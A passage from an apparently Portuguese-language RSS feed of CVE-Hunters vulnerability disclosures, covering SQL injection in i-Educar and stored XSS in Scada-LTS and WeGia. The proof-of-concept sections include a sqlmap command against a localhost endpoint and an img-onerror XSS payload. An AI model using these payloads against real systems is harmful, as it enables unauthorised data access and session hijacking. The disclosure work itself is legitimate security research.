	height=&amp;#34;463&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9531/image_hu_ad6bd9751fe854f9.png 480w, /p/cve-2025-9531/image_hu_c861952455d3f9c2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;163&amp;#34;
		data-flex-basis=&amp;#34;391px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;requisição-modificada&amp;#34;&amp;gt;Requisição modificada:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9531/image-1.png&amp;#34;
	width=&amp;#34;749&amp;#34;
	height=&amp;#34;471&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9531/image-1_hu_d6a9f2422248cbd0.png 480w, /p/cve-2025-9531/image-1_hu_8485356e4f83ee41.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;159&amp;#34;
		data-flex-basis=&amp;#34;381px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9531.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 27 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9532</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9532/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9532/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-regraavaliacaoviewidid&amp;#34;&amp;gt;CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-regraavaliacaoviewidid&amp;#34;&amp;gt;CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9532&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;RegraAvaliacao/view?id=[id]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sqlmap -u &amp;amp;#34;http://localhost:8086/module/RegraAvaliacao/view?id=1&amp;amp;#34; -p id --cookie=&amp;amp;#34;i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K&amp;amp;#34; \ --dbms=PostgreSQL --technique=B --dbs --batch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9532/image.png&amp;#34;
	width=&amp;#34;643&amp;#34;
	height=&amp;#34;181&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9532/image_hu_916de85146360227.png 480w, /p/cve-2025-9532/image_hu_f7d5ec59efe01a20.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;355&amp;#34;
		data-flex-basis=&amp;#34;852px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9532/image-1.png&amp;#34;
	width=&amp;#34;435&amp;#34;
	height=&amp;#34;330&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9532/image-1_hu_a62c4634acc8c2b6.png 480w, /p/cve-2025-9532/image-1_hu_5b7f6002eccfaf96.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;316px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 27 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9388</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9388/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9388/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9388-cross-site-scripting-xss-armazenado-no-endpoint-watch_listshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9388: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9388-cross-site-scripting-xss-armazenado-no-endpoint-watch_listshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-9388: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9388&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;watch_list.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;Watchlist&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9388/image.png&amp;#34;
	width=&amp;#34;819&amp;#34;
	height=&amp;#34;421&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9388/image_hu_c2cefdeb719d4d72.png 480w, /p/cve-2025-9388/image_hu_50dc5afcdb9bf712.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;194&amp;#34;
		data-flex-basis=&amp;#34;466px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 24 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-57762</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-57762/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-57762/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-57762-cross-site-scripting-xss-armazenado-no-endpoint-dependente_docdependentephp-parâmetro-name&amp;#34;&amp;gt;CVE-2025-57762: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-57762&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;dependente_docdependente.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
